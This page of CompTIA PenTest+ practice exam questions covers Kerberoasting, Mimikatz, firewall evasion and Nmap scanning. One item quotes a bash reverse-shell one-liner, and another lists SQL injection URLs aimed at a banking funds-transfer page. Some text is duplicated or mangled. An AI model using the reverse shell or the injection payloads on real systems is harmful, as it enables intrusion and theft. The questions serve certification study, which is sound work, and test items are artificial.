Comptia (PT0-001) Exam Questions And Answers page 17
When would a tester perform a Kerberoasting attack?
Single Choice
In which of the following scenarios would a tester perform a Kerberoasting attack?
The tester needs to retrieve the SAM database and crack the password hashes.
The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.
Attacks and Exploits
Penetration Testing Tools
Joe, an attacker, intends to transfer funds discreetly from a victim s account to his own. Which of the following URLs can he use to accomplish this attack?
https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=False&creditaccount= OR 1=1 AND select username from testbank.custinfo where username like Joe "&amount=200
https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=False&creditaccount= OR 1=1 AND select username from testbank.custinfo where username like Joe &amount=200
https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=True&creditaccount= OR 1=1 AND select username from testbank.custinfo where username like Joe "&amount=200
https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=True&creditaccount= AND 1=1 AND select username from testbank.custinfo where username like Joe "&amount=200
Attacks and Exploits
Penetration Testing Tools
Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?
LSASS
SAM database
Active Directory
Registry
Attacks and Exploits
Penetration Testing Tools
Joe, a penetration tester, was able to exploit a web application behind a firewall. He is trying to get a reverse shell back to his machine, but the firewall blocks the outgoing traffic. Ports for which of the following should the security consultant use to have the HIGHEST chance to bypass the firewall?
SMB
SMTP
FTP
DNS
Attacks and Exploits
Penetration Testing Tools
The following command is run on a Linux file system:
chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?
chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?
Kernel vulnerabilities
Sticky bits
Unquoted service path
Misconfigured sudo
Attacks and Exploits
Penetration Testing Tools
The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?
Performs a port scan.
Grabs the web server's banner.
Redirects a TTY to a remote system.
Removes error logs for the supplied IP.
Attacks and Exploits
Penetration Testing Tools
The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Choose two.)
Storage access
Limited network access
Misconfigured DHCP server
Incorrect VLAN scanned
Network access controls
Planning and Scoping
Information Gathering and Vulnerability Identification
The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning?
min-rate
max-length
host-timeout
max-rate
Attacks and Exploits
Penetration Testing Tools
When calculating the sales price of a penetration test to a client, which of the following is the MOST important aspect to understand?
The operating cost
The client's budget
The required scope of work
The non-disclosure agreement
Penetration Testing Tools
Reporting and Communication
When considering threat actor scoping prior to an engagement, which of the following characteristics makes an APT challenging to emulate?
Development of custom zero-day exploits and tools
Leveraging the dark net for non-attribution
Tenacity and efficacy of social engineering attacks
Amount of bandwidth available for DoS attacks
Planning and Scoping
Attacks and Exploits
Comments